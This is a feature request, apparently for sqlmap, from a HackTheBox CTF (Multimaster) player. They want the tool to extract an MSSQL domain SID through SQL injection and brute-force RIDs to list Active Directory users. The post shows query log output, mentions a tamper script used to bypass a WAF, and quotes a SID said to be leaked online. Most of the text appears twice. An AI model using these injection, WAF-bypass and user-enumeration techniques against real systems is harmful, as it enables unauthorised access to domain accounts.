Is your feature request related to a problem? Please describe.
Yes, my feature request is related to a problem. While trying to get the SID for an Active Directory environment from a 2017 Microsoft SQL server, I was getting output that looked like this....
[02:48:21] [INFO] fetching SQL SELECT statement query output: 'SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS')'
SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS'): 'ԁ\\u0000\\u0000Ԁ\\u0015\\u0000\\u001c병臑䧱�㛂Ȁ\\u0000'
If I use the hex flag, it looks like this...
[08:40:26] [INFO] fetching SQL SELECT statement query output: 'SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS')'
SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS'): '\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\x1c\x00Ѽс\xf1I+\xdf\xc26\x00\x02\x00\x00'
I haven't had any luck at trying to decode this to the proper format.
The SID is ... 0x0105000000000005150000001C00D1BCD181F1492BDFC236 and I got this because someone leaked it online.
I was using the tamper charunicodeencode to bypass the WAF.
Describe the solution you'd like
Implement a method of retreiving the SID from a MSSQL server, and bruteforce users RID to discover the usernames of users in AD.
Describe alternatives you've considered
I've tried this ... https://github.com/Keramas/mssqli-duet ... but this wasn't working for me. Had to edit alot of the code and still couldn't get it to work.
Additional context
Incase you want to test out your implementation of this feature, this is from the HackTheBox CTF Multimaster.
Is your feature request related to a problem? Please describe.
Yes, my feature request is related to a problem. While trying to get the SID for an Active Directory environment from a 2017 Microsoft SQL server, I was getting output that looked like this....
If I use the hex flag, it looks like this...
I haven't had any luck at trying to decode this to the proper format.
The SID is ... 0x0105000000000005150000001C00D1BCD181F1492BDFC236 and I got this because someone leaked it online.
I was using the tamper charunicodeencode to bypass the WAF.
Describe the solution you'd like
Implement a method of retreiving the SID from a MSSQL server, and bruteforce users RID to discover the usernames of users in AD.
Describe alternatives you've considered
I've tried this ... https://github.com/Keramas/mssqli-duet ... but this wasn't working for me. Had to edit alot of the code and still couldn't get it to work.
Additional context
Incase you want to test out your implementation of this feature, this is from the HackTheBox CTF Multimaster.